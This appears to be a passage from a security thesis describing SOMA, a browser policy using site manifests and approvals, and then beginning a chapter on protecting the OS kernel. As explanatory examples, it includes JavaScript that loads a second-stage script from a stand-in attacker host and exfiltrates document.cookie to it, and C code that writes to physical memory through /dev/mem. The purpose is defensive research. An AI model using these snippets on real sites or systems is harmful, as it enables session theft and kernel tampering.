While the implementation of SOMA as HTTP request/response headers could potentially lead to performance improvements due to a reduction in the number of round-trips required to load a web page, such an approach should be designed with care. Should one decide to implement SOMA as HTTP headers alongside the traditional object request, we suggest that the processing of SOMA-related headers be performed by the core web server (e.g., Apache), not the web application running alongside the web server. In doing this, web developers remain shielded from having to properly process and respond to SOMA-related requests.
A Prototype Implementation
In order to test SOMA, we created an add-on for Mozilla Firefox 2.0, licensed under the GNU GPL version 2 or later. It can be installed in an unmodified installation of Mozilla Firefox the same way as any other add-on: the user clicks an installation link and is prompted to confirm the install. If they click the install button, the add-on is installed and begins to function after a browser restart.
The SOMA add-on provides a component that does the necessary verification
of the soma-manifest and soma-approval files before content is loaded.
Since it was not possible to insert test policy files onto sites over which we had no control, we used a proxy server to simulate the presence of manifest and approval files on popular sites. We now discuss the deployment costs, any compatibility problems encountered, performance, and protection against current web attacks.
Deployment Costs
The browser, the origin sites, and the content inclusion provider sites all bear costs in deploying SOMA. Note that unlike solutions that rely heavily upon user knowledge (e.g., the NoScript add-on for Mozilla Firefox), SOMA requires no additional effort on the part of the user browsing the web site. Instead, policies are set by server operators, who are expected to have more information about what constitutes good policy for their sites.
Deployment in the Browser
The SOMA policy is enforced by the web browser, so changes are required in the browser. The prototype SOMA implementation, as used in the paper, was deployed as an add-on. The prototype SOMA add-on, when prepared into the standard XPI package format used by Mozilla Firefox, is 16kB. Uncompressed, the entire add-on is 18kB. The component that does the actual SOMA mutual approval process is 12kB. The SOMA add-on prototype provides a persistent visual indication that it is loaded in the bottom-right corner of the browser window. This visual cue was used during the development of the prototype, but could be hidden on production deployments of SOMA.
Deployment on Origin Sites
Each origin server that wishes to benefit from the protections of SOMA needs to provide a soma-manifest file. This is a text file containing a list of content-providing sites from which the origin wishes to allow included content. As mentioned earlier, each origin is specified by a domain name, protocol and (optionally) port.
This list can be determined by looking at all pages on the site and compiling a list of content providers. This could be automated using a web crawler, or done by an administrator who is willing to set policy (it is possible that sites will wish to set more restrictive policy than the site's current behaviour). In the paper, the main page of popular sites was examined to determine the approximate complexity of manifests required. The PageStats add-on was used to load the home page of each of the global top 500 sites as reported by Alexa, and the resulting log, which contains information about each request that was made, was examined. On average, each site requested content from 5.45 domains other than the one being loaded, with a standard deviation of 5.3. The maximum number of content providers was 32 and the minimum was 0 (for sites that only load from their own domain).
Of course, a site's home page may not be representative of its entire contents. As a further test, the paper documents the traversal of large sections of a major Canadian news site. The number of domains needed in the manifest was approximately 45; this value was close to the 33 needed for that particular site's home page.
Given the remarkable diversity of the Internet, sites probably exist that would require extremely large manifest files. Cursory exploration documented in the paper, however, gives evidence that manifests for common sites would be relatively small.
Deployment on Content Provider Sites
Content providers wishing to take advantage of SOMA need to provide either a file or script that can handle requests to soma-approval. The time needed to create this policy script depends heavily upon the needs of the site in question, and may range from a simple yes-to-all or no-to-all policy to more complex policies based upon client relationships. Fortunately, simple policies are likely to be desired by smaller sites (which are unlikely to have the resources to create complex policies), and complex policies are likely to be required only by larger, more connected sites.
Many sites will not wish to be external content providers, and their needs will be easily served by a soma-approval file that just contains NO. Such a configuration will be common on smaller sites such as personal blogs. It will also be common on high-security sites such as banks, which want to be especially careful to avoid cross-site request forgery and having their images used by phishing sites (phishing sites can still copy images as opposed to linking to the original image).
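Given the header-line convention described earlier, such a blanket refusal might plausibly be served as a static file along the following lines:

SOMA approval
NO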
Other sites may wish to be content providers to everyone. Sites such as Flickr and YouTube that wish to allow all users to include content will probably want to have a simple YES policy. This is accomplished either by having soma-approval always return YES, or by not hosting a soma-approval file (as the default is YES).
The sites requiring the most configuration are those that want to allow some content inclusions rather than all or none. For example, advertisers might want to provide code to sites displaying their ads. The domains that need to be approved can be determined using the list of domains already associated with each client's profile. This database could then be queried to generate the approval list. Or a company with several web applications might want to keep them on separate domains but still allow interaction between them. Again, the necessary inclusions will be known in advance and the necessary policy could be created by a system administrator or web developer.
The paper documents the overhead of soma-approval requests using data from the top 500 Alexa sites: 3244 cases in which a content provider served data to an origin site are examined. The time frame for these tests was April 2008. The average request size was 10459 bytes. Because many content providers are serving up large video, the standard deviation was fairly large: 118197 bytes. The median of 2528 bytes is much lower than the average. However, even this smaller median dwarfs the ≈ 20 bytes required for a soma-approval response. As such, we feel it is safe to say that the additional network load on content providers due to SOMA is negligible compared to the data they are already providing to a given origin site.
Compatibility with Existing Web Pages
To test compatibility with existing web pages, the global top 45 sites as ranked by Alexa were visited in the browser with and without the SOMA add-on. No SOMA compatibility issues were detected. These results were expected, as SOMA was designed for compatibility and incremental deployment.
Performance
Drawing from the paper for the performance analysis, the primary overhead in running SOMA is due to the additional latency introduced by having to request a soma-manifest or soma-approval from each domain referenced on a web page. While these responses can be cached (like other web requests), the initial load time for a page is increased by the time required to complete these requests. The manifest can be loaded in parallel with the origin page, and so we do not believe manifest load times will affect total page load times. Because soma-approval files must be retrieved before contacting other servers, however, the overhead in requesting them will increase page load times.
Since sites do not currently implement SOMA, SOMA's overhead was estimated using observed web request times. First, the average HTTP request round-trip time for each of 40 representative web sites was measured on a per-domain basis using PageStats. The per-domain average was used as a proxy for the time to retrieve a soma-approval from a given domain. Then, to calculate page load times using SOMA, the time to request all content from each accessed domain was increased by the soma-approval request time estimated for that domain. The time of the last response from any domain then serves as the final page load time.
2 The representative sample included banks, news sites, web e-mail, e-commerce, social networking, and less popular sites.
After running our test 30 times on 40 different web pages, the paper documents the average additional network latency overhead due to SOMA as increasing page load time from 2.9 to 3.3 seconds (or 13.28%) on non-cached page loads. On page loads where the soma-approval is cached, the overhead is negligible. This increase is due to network latency and not CPU usage. If 58% of page loads are assumed to be revisits, the average network latency overhead of SOMA drops to 5.58%. We expect that this overhead could drop further should SOMA be implemented within the HTTP headers (as discussed earlier).
Given that soma-approval responses are extremely small (as discussed above), they should be faster to retrieve than the average round-trip time estimate used in our experiments. These values should therefore be seen as a worst-case scenario. In practice, we expect SOMA's overhead to be significantly less.
Protection Against Current Attacks
In order to verify that SOMA actively blocks information leakage, cross-site request forgery, cross-site scripting, and content stealing, examples of these attacks were created. In the paper, the SOMA add-on was specifically tested with the following attacks:
1. A GET request for an image on another web site (testing both GET-based cross-site request forgeries as well as content stealing).
2. A POST request to a page on another web site done through JavaScript (testing POST-based cross-site request forgeries).
3. An iframe inclusion from another web site (testing iframe-injection-based attacks).
4. Sending either a cookie or personal information to another web site (testing information leakage).
5. A script inclusion from another web site (testing a bootstrap cross-site scripting attack).
All attacks were hosted at domain A and used domain B as the other domain involved. All attacks were successful without SOMA. With SOMA, these attacks were all prevented by either a manifest at domain A not listing B or a soma-approval at domain B which returned NO for domain A. We now discuss in more detail how SOMA works to block each type of attack.
Cross-Site Scripting Bootstrap
While the most general form of a cross-site scripting attack (as discussed earlier) does not result in communication with any external sites as the compromised page is viewed, a subset of cross-site scripting attacks do involve loading additional code from a remote URL. For those attacks, the cross-site scripting exploit is a multi-step process.
The first step involves finding and exploiting a cross-site scripting vulnerability, as discussed earlier. Because many cross-site scripting vulnerabilities only result in an attacker being able to upload very short snippets of JavaScript, a common approach is to use the code embedded into the page through the vulnerability as a bootstrap. The bootstrap code loads another, longer script which can perform the complex operations that the attacker may need to perform to take full advantage of the cross-site scripting vulnerability. This secondary script is often located on a different external server that the attacker can easily host scripts on.
The second step of exploiting a cross-site scripting vulnerability through loading additional JavaScript from a different external site is limited by the SOMA manifest in the following way. If the site which hosts the additional JavaScript is not listed on the manifest, then the bootstrap process will fail. In order to exploit a cross-site scripting vulnerability for a site deploying SOMA, the attacker must either embed all the JavaScript attack code in the server request being exploited to perform the attack (assuming the attack code is short enough to not be truncated or rejected), or the additional JavaScript must be hosted on a site listed in the SOMA manifest file.
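A sketch of the bootstrap step (the attacker's host name is illustrative); under SOMA, the fetch of the secondary script fails unless attacker.example.net appears in the victim site's manifest:

// Short snippet injected through the cross-site scripting vulnerability.
var s = document.createElement("script");
s.src = "http://attacker.example.net/payload.js";  // the longer second-stage script
document.body.appendChild(s);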
Unrestricted Outbound Communication
As discussed earlier, the ability to scrape potentially sensitive information from a web page (including form input) and send it to a server controlled by the attacker is a current threat. Similar to how SOMA defends against the cross-site scripting attack, this attack is limited through the use of a SOMA manifest. If the manifest file does not list the attacker's site as one of the authorized external sites, the attempt to send information to the attacker's server will fail (since no communication will occur between the browser and the attacker-controlled server unless it is on the manifest).
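A sketch of such an exfiltration attempt, reusing the image-fetch trick of Figure 3.3 (the attacker's host is illustrative); with a manifest in place that does not list attacker.example.net, a SOMA-enforcing browser never issues the request:

// Injected JavaScript reads data it is allowed to read (same origin) ...
var stolen = encodeURIComponent(document.cookie);
// ... and tries to leak it by encoding it into a request to the attacker.
var beacon = new Image();
beacon.src = "http://attacker.example.net/collect?c=" + stolen;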
Recursive Script Inclusion
Similar to the cross-site scripting bootstrap discussed above, a recursive script inclusion involves a legitimate script loading another script that the developer of the web application did not intend to be loaded. While the author of site A may refer to scripts on domain B, the author may not wish site B to turn around and load scripts from site C.
A common use of recursive script inclusion is ad syndication, as discussed earlier. Ad syndication has been used in the past as a vector to compromise web sites, and hence developers may want to enforce that ad syndication remain disallowed. To disallow ad syndication, the developer of a web site creates a SOMA manifest specifying the ad server, forcing all ad elements to come directly from the ad server and not through other external sites.
Drive-By Downloads
A typical drive-by download is initiated when a victim uses their browser to visit a landing web page that is malicious. This landing page may be intentionally malicious (e.g., the victim visits the attacker's site directly) or it may have become malicious as a result of being compromised by an attacker. Typically, sites which have been compromised by an attacker are much more likely to receive high volumes of traffic than sites hosted by the attacker directly (e.g., the Dolphin Stadium website was compromised by an attacker during the Super Bowl in 2007, embedding a link to malicious JavaScript). The malicious activities of the landing page are typically hidden in an attempt to keep the malicious actions undetected. To hide the malicious activities of the landing page, a single reference to a URL will be embedded in it, normally in the form of a script or iframe tag, leaving the rest of the landing web page as it had appeared before the compromise. Furthermore, the malicious content pointed to by the URL will not typically be hosted on the same server as the landing page.
For those malicious landing pages that have been compromised by the attacker, SOMA provides a defence. If the site hosting the landing page also hosts a SOMA manifest, the malicious content would have to be hosted on a site listed in the manifest for the attack to succeed. If the malicious content is not hosted on a site listed in the SOMA manifest, browsers enforcing SOMA will not fetch the malicious content, causing the attack to fail.
The drive-by download attack is very similar to the cross-site scripting attack discussed above. Both refer to malicious content through a URL embedded on the site, and both can be protected against through the use of a SOMA manifest (not listing the attacker's server) and a SOMA-enabled browser.
Cross-Site Request Forgery
As discussed earlier, a cross-site request forgery results in requests to a victim site that the web browser user did not intend. These requests, however, are submitted as part of loading or viewing a page that came from a different origin.
SOMA prevents cross-site request forgery when an approval script is used at the victim site. Any request to the victim will be prefixed with a request to the approval script, specifying the origin of the page which is causing the request. In such an attack, the malicious host would be specified in the request to the approval script. In order to prevent the subsequent cross-site request forgery, the victim web site needs only to answer NO to the approval request.
Clickjacking
As discussed earlier, a clickjacking attack involves covering up content on a web page delivered from the target server with content originating from an attacker. If the base web page is delivered from an attacker-controlled server and content from the target is embedded into it, clickjacking can be mitigated through the use of a SOMA approval script on the target web server. If the base web page is delivered from the target web server and the additional malicious content comes from an attacker-controlled server, then the use of a SOMA manifest file which does not include the malicious server as an accepted origin will mitigate the clickjacking attack.
Bandwidth Stealing
As discussed earlier, bandwidth stealing results in content being embedded in a web page against the wishes of those responsible for the servers on which the content is hosted. SOMA protects against bandwidth stealing in a way similar to blocking cross-site request forgeries (discussed above). Any request to embed content in a site from a different origin will result in a request to the victim site for approval. To avoid having content embedded in pages coming from a different origin, the victim need only answer NO when queried by a SOMA-enabled browser.
Related Work
Because modern browsers are capable of browsing multiple sites concurrently, the objects associated with one site in the browser must be properly segregated from objects related to another in order for the same origin policy to be properly enforced. Chen et al. examined gaps in current implementations of the same origin policy related to the ability to view multiple pages concurrently in a browser. They proposed a script accenting mechanism to mark data as associated with a particular web page, using it to prevent data leakage between different web pages being viewed within the browser. Barth et al. also proposed an algorithm for detecting illegitimate sharing of content within the browser. Jackson et al. also focused on communication within the browser, examining how web pages can gain information about other web pages which have been viewed in the browser and how to restrict such information leakage.
Ries et al. proposed filtering known-malicious JavaScript at the client before it is processed by the web browser. Their approach focuses on JavaScript which is known to exploit browser bugs. Unlike SOMA, these approaches focus on local rather than remote communication.
Same Origin Policies in Other Domains
The term "same origin policy" is one which has been overloaded, referring to different things depending on the context. While we use it in this thesis to refer to restrictions placed on the ability of JavaScript to read and modify objects tagged with a different origin, there are several other definitions worth mentioning.
Cookie Same Origin Policy
Cookies do not have a same origin policy according to the formal descriptions of them. Regardless, some have termed the policy which dictates a browser's handling of cookies the same origin policy. Cookies are small strings sent by a server to the browser. The browser holds onto these strings, sending them back to the server in the headers of subsequent requests.
The cookie same origin policy is related to, but distinct from, the JavaScript same origin policy. The cookie policy refers to how cookies are stored and sent back to the server. While any server can set a cookie in the browser (subject to additional constraints imposed by the browser), each cookie is associated with a specific domain name. Only requests to a server with the same domain name as associated with the cookie will receive that cookie when a request is made by the browser. Additional restrictions can further limit the sending of cookies to a domain depending on the SSL state, port number, or path name of the specific request.
The HTTP-only cookie extension prevents JavaScript from accessing cookies which are sent between the client and server, even if the JavaScript has come from the same origin as the cookie.
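For illustration, a server might set such a cookie with a header of the following form (the cookie name, value, and domain are hypothetical); the Domain, Path, and Secure attributes scope when the cookie is sent back, and HttpOnly hides it from JavaScript:

Set-Cookie: session=a3f9c2; Domain=example.org; Path=/; Secure; HttpOnly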
SOMA operates at the granularity of requests, restricting fetches for remote content. If a request is blocked by SOMA, all headers related to the request, including the cookie header, will not be sent to the remote server.
Flash Same Origin Policy
The same origin policy dictates that JavaScript running in a web browser is not allowed to read content which comes from a different origin than the base HTML page. Scripts embedded into Flash are not subject to the restrictions imposed by the browser, but instead to those imposed by Flash.
The Flash same origin policy is very similar to the same origin policy implemented in the web browser, with one exception: for a Flash object coming from origin A, requests by the Flash script can be made to origin B if and only if B provides a /crossdomain.xml file listing origin A. This allows a script to perform cross-domain requests (in contrast to JavaScript AJAX requests, discussed earlier).
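For example, a /crossdomain.xml file at origin B permitting Flash content loaded from www.example.com (an illustrative host name) to make requests to B might look like the following:

<?xml version="1.0"?>
<cross-domain-policy>
    <allow-access-from domain="www.example.com"/>
</cross-domain-policy>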
Alternative Methods of Improving JavaScript Security
NoScript involves the user maintaining a whitelist of sites the user authorizes to run JavaScript. The ability of NoScript to protect the user is directly related to the user's ability to maintain the whitelist. Indeed, many recent versions of NoScript have introduced additional components more in line with SOMA. These components do not require user intervention and can render harmless certain clickjacking and cross-site request forgery attacks; SOMA provides a consistent approach for blocking both (and indeed more web vulnerabilities, as discussed above). NoScript, with its whitelist, is not backwards compatible, breaking many existing web sites. We believe that in its current form, NoScript is unlikely to be enabled by default by any large browser vendor.
Web-based execution environments have all been built with the understanding that unfettered remote code execution is extremely dangerous. SSL and TLS can protect communication privacy, integrity, and authenticity, while code signing can prevent the execution of unauthorized code. Neither approach protects against the execution of malicious code within the browser.
Java was the first web execution environment to employ an execution sandbox and restrictions on initiating network connections. The Java policy for restricting network communication was designed to prevent Java applets from communicating with any server other than the one they were retrieved from. Subsequent systems for executing code within a browser, including JavaScript, have largely followed the model as originally embodied in Java applets.
While there has been considerable work on language-based and module-based sandboxing, only recently have researchers begun addressing the limitations of sandboxing with respect to JavaScript applications.
Alternate Protections Against Specific Web Attacks
There have been many attempts in the past to protect against various web-based attacks. Some, including a proposal related to SOMA by Schuh, involve the browser enforcing firewall-style rulesets provided by the origin as a way of protecting against several different attacks. Other approaches focus primarily on a single type of web attack. These approaches include defences against cross-site scripting and cross-site request forgery, as described below.
Cross-Site Scripting
Cross-site scripting vulnerabilities exist when the parse tree for a page can be modified in a way not intended by the web application developer. By restricting changes to the parse tree generated by the browser, the opportunity exists to eliminate cross-site scripting vulnerabilities. Ter Louw et al. propose Blueprint, an approach for generating the parse tree for the web page at the server and ensuring it is not interpreted differently at the client. Their approach, while covering many of the cross-site scripting vulnerabilities not protected against by SOMA, requires all web application developers to buy in to the approach, redesigning their applications to match the requirements of Blueprint.
Another approach that can be implemented on the server involves performing dynamic taint tracking (combined with static analysis) to detect the information flows associated with XSS attacks. Noxes is a client-side web proxy approach which uses manually and automatically generated rules to mitigate possible cross-site scripting attacks.
Barth et al. proposed a defence against cross-site scripting attacks performed through content sniffing. Their solution involves modifying browsers to restrict content sniffing such that executable JavaScript cannot easily be embedded into content uploaded to the web server.
The Mozilla content security policy (previously called site security policy) focuses primarily on mitigating cross-site scripting attacks. It is a much more complex policy than SOMA and requires modifications to the web applications themselves. SOMA does not require the same buy-in from web application developers.
Bojinov et al. introduced a multi-service variant of cross-site scripting, along with a potential solution. The variant involves injecting the malicious content through a non-web based vulnerability. Such an approach may be feasible on devices which host multiple services (e.g., injecting a web attack via the ftp service). If the injected attack initiates a bootstrap (as discussed earlier), SOMA prevents the bootstrap.
Cross-Site Request Forgery
Several approaches have focused on mitigating cross-site request forgery. Barth et al. proposed a solution to login-based cross-site request forgery using the HTTP Origin header and web application based firewall rules on the server. Jovanovic et al. proposed a server-side proxy solution where a session ID is embedded into every link found in the web page generated by the server. Unless the subsequent request from the client browser contains the unique session ID, it is rejected by the proxy (before it can be processed by the real web server). Web applications written to defend against cross-site request forgery attacks are likely to use the standard approach of themselves embedding the session ID into each URL sent out by the web server, negating the need for the proxy.
The SOMA approach of using approvals also prevents cross-site request forgeries from being sent to the web server, but does not require a proxy. Instead, the browser is responsible for preventing such requests from being sent.
Mashups
Recently several researchers have focused on the problem of web mashups, which may be created on the client or server. Client-side mashups are composite JavaScript-based web pages that draw functionality and content from multiple sources. To make these mashups work within the confines of the same origin policy, remote content must either be separated into different iframes or all code must be loaded into the same execution context. The former solution is, in general, too restrictive while the latter is too permissive; client-side mashup solutions are designed to bridge this gap. Two pioneering works in this space are Subspace and MashupOS. SOMA restricts communication between the web page (browser) and servers, while mashup solutions restrict local communication between elements on the page.
SOMA breaks client-side mashups which use code hosted on a site not included in the manifest. In order for a mashup to work with SOMA, every web site involved must be explicitly listed in the manifest and also allow its content
to be included (through responding YES to an approvals request). While such restrictions may inhibit the creation of new, third party mashup applications, they also prevent attackers from creating malicious mashups (e.g., combinations of a legitimate bank's login page and a malicious login box). SOMA is designed such that it can be implemented on sites that want the increased protection that SOMA provides. Mashup sites may choose not to enable SOMA.
SOMA does not affect server-side mashups.
DNS Rebinding Attacks
DNS rebinding attacks are one method of bypassing the current same origin policy. The attack involves rapidly changing the IP address associated with a domain name so that multiple unrelated servers are associated with the same domain name, allowing JavaScript to read and modify content across the different physical servers. Karlof et al. proposed a solution to this attack which involves tying the origin of a page to the X.509 certificate instead of the DNS name.
SOMA operates in the browser, using and blocking HTTP requests. It relies on the web browser for host name to IP address resolution. SOMA is therefore susceptible to the same DNS rebinding attacks as the browser itself. Protection against DNS rebinding attacks, when implemented in the browser, will also protect SOMA. One such solution is DNS pinning, where the browser forces all content for a domain to be fetched from the same IP address. When applied to SOMA, DNS pinning would result in all content being fetched from the same IP address as the related SOMA manifest or approval request.
Restricting Information Flows
While the general problem of unauthorized information flow is a classic problem in computer security, little attention has been paid in the research community to the problems of unauthorized cross-domain information flow in web applications beyond the strictures of the same origin policy. This is despite the fact that cross-site scripting and cross-site request forgery attacks rely very heavily upon such unauthorized flows. Of course, the web was originally designed to make it easy to embed content from arbitrary sources. With SOMA, we are simply advocating that any such inclusions should be explicitly approved by both parties.
Final Remarks
While SOMA is a novel proposal, we based the design of soma-approval and soma-manifest on existing systems. The soma-approval mechanism was inspired by the crossdomain.xml mechanism of Flash. External content may be included in Flash applications only from servers with a crossdomain.xml file that lists the Flash applications' originating server. Because the response logic behind a soma-approval request can be arbitrarily complex, we have chosen to specify that it be a server-side script rather than an XML file that must be parsed by a web browser.
The soma-manifest file was inspired by Tahoma, an experimental VM-based system for securing web applications. Tahoma allows users to download virtual machine images from arbitrary servers. To prevent these virtual machines from contacting unauthorized servers (e.g., when a virtual machine has been compromised), Tahoma requires every VM image to include a manifest specifying what remote sites that VM may communicate with.
Note that individually, Flash's crossdomain.xml and Tahoma's server manifest do not provide the type of protection provided by SOMA. With Flash, a malicious content provider can always specify a crossdomain.xml file that would allow a compromised Flash program to send sensitive information to the attacker. With Tahoma, a malicious origin server can specify a manifest that would cause a user's browser to send data to an arbitrary web site, thus causing a denial-of-service attack or worse. By including both mechanisms, we address the limitations of each.
It is interesting to note that most of the attacks prevented by SOMA can already be mitigated by web developers properly using existing security mechanisms. The fact that web application vulnerabilities are so prevalent is a testament to the inability of web application developers to handle the complexities of designing a secure web application. SOMA is designed to greatly simplify the development of web applications by providing the web developer with a run-time environment that provides greater isolation and hence a greater level of security. SOMA focuses on those operations which are inherently dangerous and seeks to limit them. The approach discussed in this chapter does not rely on the end-user for enforcement, is enforced on all web applications using the SOMA-enabled browser, and is implemented by guardians (the browser vendor and web server administrator). It therefore follows the thesis objective of providing a guardian-based mandatory access control mechanism which can be deployed.
Limiting Privileged Processor Permission
In this chapter, we look at a mandatory access control policy mechanism which already exists but which has not been fully utilized in many systems – separating root and kernel-level control. We argue for the increased use of this policy mechanism as a method for protecting the kernel (both in Linux and Windows). We examine the protection of the kernel against software running at lower protection levels, including applications and scripts which execute on a typical system. For the purposes of this chapter, we focus on the protection levels common in a typical desktop computer.
While the focus of this chapter is on applications running with root level privileges and their ability to modify other elements on a desktop, as background we first review the different protection levels which exist within a modern desktop.
A Permission Hierarchy
The modern desktop computer system is composed of a number of different protection level layers that have been designed to segregate different elements of the system. These protection levels are illustrated in Figure 4.1. Within each stack (software, or any system device), all the higher protection level elements can read and write to areas occupied by the elements at the lower protection levels. We now discuss each of the protection levels as well as what aspect of the desktop system is responsible for maintaining the separation between the protection levels. We do not examine the possibility of malicious hardware in this thesis.
Figure 4.1. Enforcement between protection levels in a modern desktop.
A System Device
Typically, system devices are composed of hardware and firmware working together to provide functionality. The hardware hooks into the system bus and exposes the functionality provided by the device (e.g., for an optical drive, this allows the software stack to access certain properties of the drive as well as the data on any inserted optical disk).
The privileges of the device firmware, including its ability to interact with the rest of the system, are dictated by the underlying hardware (both that of the device the firmware runs on, as well as the hardware the device is connected to). These restrictions can be in the form of specific hardware limits imposed to prevent damage, or limits in the form of functionality which is simply not made available to the firmware. As an example, the range of motion of the read head in an optical drive is limited by the firmware, while writing to optical media may be prevented by simply installing a laser not powerful enough to actually 'burn' media.
Many devices are built in such a way that the firmware can be upgraded.
For these devices, the new firmware must transition from the software stack to
the system device. If either the CPU or hardware on the system device disallows the upgrading of firmware, the upgrade will fail. A similar situation occurs for those devices that do not store their own firmware in non-volatile memory but instead rely on the software to re-upload the firmware during system initialization. This situation is similar to the upgrading of firmware, but happens on a more frequent basis. In Figure 4.1, we illustrate the firmware that gets sent to the system device as being contained within the hypervisor layer. While the firmware can in fact also be housed at any lower protection layer in the software stack (and be subject to the privilege restrictions of all the higher protection levels as it transitions onto the system device), firmware modified and stored at any lower protection level may present a way of bypassing the protection mechanisms imposed on the lower protection levels. Firmware malcode exploits this ability to circumvent the protection levels within a desktop, and indeed methods of protecting against firmware malware have already been proposed.
The Software Stack
The most visible protection level stack that exists on a common desktop is the software stack. As illustrated in Figure 4.1, it includes the processor, potentially a hypervisor, the operating system kernel, applications, and scripts. At the base of the software stack is the CPU, the processor that all the software runs on. The processor is responsible for many of the protection mechanisms used to keep other elements in the software stack at their respective protection levels. It does this through a combination of two mechanisms: the paging subsystem and the privilege level subsystem.
The paging subsystem presents a translation layer between the virtual addresses used by software running on the processor and the physical addresses corresponding to the actual location in memory that is being referenced. Each block of virtual memory can be mapped to an arbitrary block of physical memory, with the exact mapping being maintained as an entry in the page table. The processor restricts the ability to update the page table to only privileged code (i.e., the OS kernel). The OS kernel is responsible for maintaining this mapping (for the moment, we will assume a hypervisor is not present). When an application is being run, the page table mappings are configured to allow access only to physical memory allocated to the currently running application. Because the mapping is controlled by the operating system, the application is restricted from accessing memory belonging to other applications on the system. While the OS kernel shares the same page table as the application, memory associated with the kernel remains protected through a privilege level bit enforced by the processor.
In its simplest form, the privilege level subsystem of a modern processor is a single bit, indicating whether the currently executing instructions have privileged or user level control of the processor. Privileged mode is normally associated with the operating system kernel, with user mode being associated with all other code which is running. This separation between privileged and user mode is not the same as is commonly referred to in many access control systems (more on this later). In addition to some assembly instructions only being accessible to code running with privileged control, the paging subsystem is capable of restricting access to memory based on whether the code currently running is privileged. A specific page of memory can be indicated as read-only for any user code running but read/write for privileged code. The OS kernel uses this privileged bit and associated access restrictions in the page tables to prevent user code from writing to pages belonging to the operating system (including memory pages containing the page tables themselves). Any attempt by user code to either execute privileged assembly instructions or modify read-only pages of memory is trapped by the processor and forwarded to the privileged code. The privileged code can either reject the attempt or emulate the operation on behalf of the user code.
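To make the interaction between the privilege bit and the paging subsystem concrete, the following sketch (ours, simplified to the flag bits of a classic 32-bit x86 page table entry; the real processor logic is considerably more involved) shows how an access by user or privileged code would be judged.

    #include <stdbool.h>
    #include <stdint.h>

    /* Flag bits of a classic 32-bit x86 page table entry (simplified). */
    #define PTE_PRESENT  (1u << 0)   /* page is mapped                               */
    #define PTE_WRITABLE (1u << 1)   /* page may be written                          */
    #define PTE_USER     (1u << 2)   /* page accessible to user (unprivileged) code  */

    /* Decide whether an access should be allowed or trapped.  'user' is true
     * when the currently executing code has user (not privileged) control. */
    static bool access_permitted(uint32_t pte, bool user, bool is_write)
    {
        if (!(pte & PTE_PRESENT))
            return false;             /* unmapped: always faults                     */
        if (user && !(pte & PTE_USER))
            return false;             /* page reserved for privileged code           */
        if (user && is_write && !(pte & PTE_WRITABLE))
            return false;             /* read-only for user code; privileged code may
                                       * still write (assuming the processor's
                                       * write-protect control bit is clear)         */
        return true;
    }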
This setup, with the OS kernel being privileged and all other code being restricted in the operations it can perform, provides the basis for the software protection level stack. When a hypervisor is inserted into the mix, it becomes the code to which privileged permission is given by the processor, and the OS kernel is instead run with user processor protection. Any attempt by the OS kernel to then execute privileged operations can be caught by the hypervisor and handled accordingly. The hypervisor can also ensure that the OS kernel is kept separated from other code running with user permission.
For scripts that execute in the software stack, it is the job of the script interpreter to impose any desired restrictions on the script. The script interpreter, in turn, is restricted by the operating system, and so on down the chain. A good example of this is JavaScript running in a browser, which is prevented from accessing the local file-system even though the browser itself can access files (subject to constraints imposed by the OS kernel). The same holds true for Java, where the byte code is interpreted and controlled by the JVM, which in turn is an application controlled by the OS kernel.
Methods of Modifying Kernel Code
On a modern desktop system, almost all code is run with user level processor control, regardless of the access control mechanisms being imposed (indeed, it is the job of the OS kernel to impose any additional access control restrictions
required for the system). Every single application, even those run by root, is still run as user code as far as the processor is concerned.
Because all applications are run with user level processor control, they do
not have the same privileges as those given by the processor to the OS kernel.
Instead, they need to request that certain operations be done by the OS kernel on their behalf (so that they are allowed by the processor). The OS kernel itself typically restricts the interfaces that are available for changing itself (and hence allowing new code to run with privileged processor permission). Typically, the OS kernel will provide a few interfaces for extending its code.
Physical Memory Access
The kernel may export to applications an interface which allows arbitrary access to the physical memory of the machine. This allows an application to:
1. Talk to hardware mapped into memory.
2. Read from and write to memory allocated to another application already
running on the system.
3. Read from and write to memory allocated to the kernel.
Because this interface allows arbitrary modifications to all code currently residing in memory, permission to use this interface is normally restricted by the OS kernel to only applications running with the highest privileges (superuser). On Linux, this interface is typically a device node labelled as /dev/mem. Another related device node which only exposes kernel memory for reading and writing is /dev/kmem. On Windows, the device node for modifying physical memory is \Device\PhysicalMemory.
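To illustrate why this interface is so powerful, the following user-space sketch (ours; the physical address is a placeholder, and a kernel with the restrictions discussed later in this chapter would reject it) maps a page of physical memory through /dev/mem and writes to it.

    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <sys/mman.h>
    #include <sys/types.h>
    #include <unistd.h>

    int main(void)
    {
        off_t  phys = 0x100000;   /* placeholder physical address (page aligned) */
        size_t len  = 4096;

        int fd = open("/dev/mem", O_RDWR | O_SYNC);    /* normally requires root */
        if (fd < 0) {
            perror("open /dev/mem");
            return 1;
        }

        /* Map one page of physical memory into this process's address space. */
        uint8_t *p = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, phys);
        if (p == MAP_FAILED) {
            perror("mmap");
            close(fd);
            return 1;
        }

        p[0] = 0x90;              /* arbitrary write into physical memory */

        munmap(p, len);
        close(fd);
        return 0;
    }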
Kernel Modules
A second way of expanding the OS kernel with new code that is considered privileged is through loading a kernel module. Kernel modules allow new code to be inserted into the kernel and run as privileged by the processor. This provides a structured, stable way of expanding the functionality of the OS kernel (as opposed to modifying the kernel through physical memory access, which tends to be fragile).
Swap
In a modern kernel, the swap (or page) area on disk is designated for excess memory allocated by a process which is not currently being stored in physical memory. The contents of physical memory are written (or paged) to disk and the physical memory reassigned by the OS kernel.
A related kernel interface provides applications with the ability to read from and write directly to storage, bypassing the file-system and associated access controls. Performing such reads and writes is typically referred to as performing raw disk I/O. When the ability to write to storage is combined with the kernel paging to disk, applications inherit the ability to modify memory potentially associated with other applications. If portions of kernel memory are paged out to disk, applications can also modify the kernel through writing to the area of disk occupied by swap.
Kernel Image
When a system first boots, the kernel must be loaded from somewhere before it can start running. If an application has the ability to write to the area of disk occupied by the kernel, the application can modify the code which is run with privileged processor permission after the next reboot of the system. To protect the kernel, we must ensure that the kernel image on disk cannot be updated by malware. We must also ensure that the boot loader (e.g., GRUB), which is responsible for loading the kernel, cannot be modified by malware. In this thesis, we do not consider the case where the physical media is inserted into an alternate machine and then the kernel is updated.
Replacing the running kernel image is possible in Linux through the kexec system call. This functionality allows the booting of arbitrary code on an already-running system, giving it privileged processor control. To protect the kernel, we must also disable the running of arbitrary code through kexec.
The Protection Mechanism
